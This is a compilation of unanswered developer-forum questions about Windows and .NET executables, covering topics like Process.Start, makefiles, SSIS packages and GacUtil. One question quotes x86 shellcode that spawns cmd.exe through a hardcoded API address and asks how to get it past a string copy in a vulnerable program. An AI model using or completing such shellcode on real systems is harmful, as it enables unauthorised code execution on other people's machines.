I was trying to execute a command through C#, but when I run the following code, a blank cmd window just opens up. The code:
string command = string.Format(@"adb install C:\Users\Mohit\Programming\Android_Workspace\{0}\bin\{0}.apk", appName);
ProcessStartInfo cmdsi = new ProcessStartInfo("cmd.exe");
cmdsi.Arguments = command;
Process cmd = Process.Start(cmdsi);
What could be wrong? I am sure the syntax is right.
I have to get the absolute path of a windows service in a .Net Admin application. I am using ServiceController of .Net as shown below.
ServiceController serviceController = new ServiceController(serviceName);
But I don't see any property here to get the absolute path of the .exe of the service. Is there anyway to get this programmatically.
I am importing SSIS packages to SQL Server 2008 that were originally built for SQL Server 2005. I upgraded them in VS2008 and them imported them. They all import and work except for the one with the Konesans File system Watcher task. I installed in the setup exe for Konesans File system Watcher SQL Server 2008 on my dev pc and the production server, but still get this error:
Exception from HRESULT: 0xC0010026 (Microsoft.SqlServer.DTSRuntimeWrap)
Any advice?
I have an application which currently has an option to call phone numbers. Now by default it opens the Windows Phone dialler utility and tries to call the number.
I want it to instead make the call using skype, so what I was thinking was to create a c# application which would capture the callRequest and instead call skype.exe /callto:
Has anyone done anything like this before?
I didn't think this was going to be hard. I have a commmand file, d:\a.cmd which contains:
copy /b d:\7zS.sfx + d:\config.txt + d:\files.7z d:\setup.exe
But this line of C# wont' execute it:
Process.Start("d:\\a.cmd");
Throws Win32Exception: "%1 is not a valid Win32 application."
Process.Start opens .pdf files...why not execute command files?
Thanks in advance,
Jim
Hi
After trying out VS2010b2 also my VS2008 installation changes the versions of solution and project files to "Version 10.00". The MSBuild.exe on our CI Server does not support them.
Is there a way to make VS2008 generate sln files with version number 9.00 again?
I know, i can fix that manually. But each time I open a solution, the version gets changed back, which is annoying.
Cheers,
bja
Why is my shellcode is truncated after \x20 opcode, when it is copied by string to stack on a second vulnerable program?
--cmd.exe--
char shell[]=
"\xc7\x44\x24\x0c\x65\x78\x65\x20" ← only this line is put in stack, though hv a enough space
"\xc7\x44\x24\x08\x63\x6d\x64\x2e"
"\x31\xc0"
"\x89\x44\x24\x04"
"\x8d\x44\x24\x08"
"\x89\x04\x24"
"\x8d\x05\xad\x23\x86\x7c"
"\xff\xd0";
--end shell--
Does anyone know what graphics library is used to create the graphics in the Solitaire and Freecell games included with Windows Vista (e.g. XNA, GDI, WPF)? A good answer would include the name of the library and evidence.
I looked at solitaire.exe with dependency walker and it shows many calls to gdi32.dll and gdiplus.dll, but also a call to Direct3DCreate9 in d3d9.dll.
Hello, I'm writing a makefile and I can't figure out how to include all my source files without having to write all source file I want to use. Here is the makefile I'm currently using:
GCC= $(GNUARM_HOME)\bin\arm-elf-gcc.exe
SOURCES=ShapeApp.cpp Square.cpp Circle.cpp Shape.cpp
OBJECTS=$(SOURCES:.cpp=.o)
EXECUTABLE=hello
all: $(EXECUTABLE)
$(EXECUTABLE): $(OBJECTS)
#$(CC) $(LDFLAGS) $(OBJECTS) -o $@
.cpp.o:
$(GCC) -c $< -o $@
How do I automatically add new source file without having to add it to the sources line?
Thanks,
Mike.

Is there a way to Minimize an external application that I don't have control over from with-in my Delphi application?
for example notepad.exe, except the application I want to minimize will only ever have one instance.
In window form, I made a button and I'm trying to make it send F1 to a specific window (Such as FireFox, My Computer, etc...)
My questions are :
How do I do it by the window's name? (such as "Mozilla Firefox")
How do I do it by the process's name? (such as firefox.exe)
When I try to generate a unit test for the following method (in a public static class)
private static string[] GetFields(string line, char sep)
{
char[] totrim = { '"', ' ' };
return line.Split(sep).Select(col => col.Trim(totrim)).ToArray();
}
The Tests output says:
While trying to generate your tests, the following errors occurred:
This method or property cannot be called within an event handler.
It works if I make the function public - I've tried running Publicize.exe manually, it doesn't complain, but doesn't make any difference either.
I can display and select a single file in windows explorer like this:
explorer.exe /select, "c:\path\to\file.txt"
However, I can't work out how to select more than one file. None of the permutations of select I've tried work. Help!
Note: I looked at these pages for docs, neither helped.

Hi,
I have to create few forms and give it as direct EXE (instead of installer, which installs .NET framework, which the end user is not happy, they want something they can directly open and work).
I know it can be done as web, but am looking for winforms?
Please suggest which tool/technology can handle this?
Thanks,
Karthick
I'm looking for a way to add a Subject Alternative Name in my certificate request in the IIS 6.0 certificate creation wizard.
It seems I can only fill the Subject field and not the Subject Alternative Name.
Trying to follow this guide (http://support.microsoft.com/kb/931351) using certreq.exe doesn't help, it fails without any hint except that it prints its manual.
Any suggestions appreciated, I hope I won't have to export my public key and generate the csr with openssl :/
Trying to solve this problem.
I would like to learn how the bootstrapper detects if prerequisites (specifically .NET 3.5) are installed.
According to this reference, a way to detect if .NET is installed is to check the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5
Using process monitor, I have inspected registry queries done by the bootstrapper (setup.exe) and it did not show any access to this registry key.
Does anybody know how the bootstrapper determines whether the prerequisites are installed on the target system?
I am using VS2008 C# and testing on my local XP Pro PC with local IIS, I have wrote a web service to call a third party software .exe file to use svn checkout commands to insert data into a folder, which use System.Diagnostics.Process.Start . The same codes did work when I use VS2008 build-in ASP.NET Development Server(http://localhost:2999/MyServices/MyServices.asmx). but when I use IIS normal URL(http://developer/MyServices/MyServices.asmx) to run Process.Start on the web service, it just haunlted and not doing anything.plz send one sample program.
I want to do something like this
ffmpeg -i audio.mp3 -f flac - | oggenc2.exe - -o audio.ogg
i know how to do ffmpeg -i audio.mp3 -f flac using the process class in .NET but how do i pipe it to oggenc2?
Any example of how to do this (it doesnt need to be ffmpeg or oggenc2) would be fine.
I'm getting a System.NullReferenceException when my application starts up (after a small login screen) which doesn't crash the entire app but prevents it from loading correctly.
How can I get the VS.Net debugger to stop at the error so I can fix it?
The output I'm getting in the Immediate Window is:
A first chance exception of type 'System.NullReferenceException' occurred in GrelisCrampApp.exe
Hi
I need to register an assembly in the GAC using batch file. Is there a way to find the installation location of GacUtil.exe or is there a way to register the assembly without GacUtil?
Thank you,
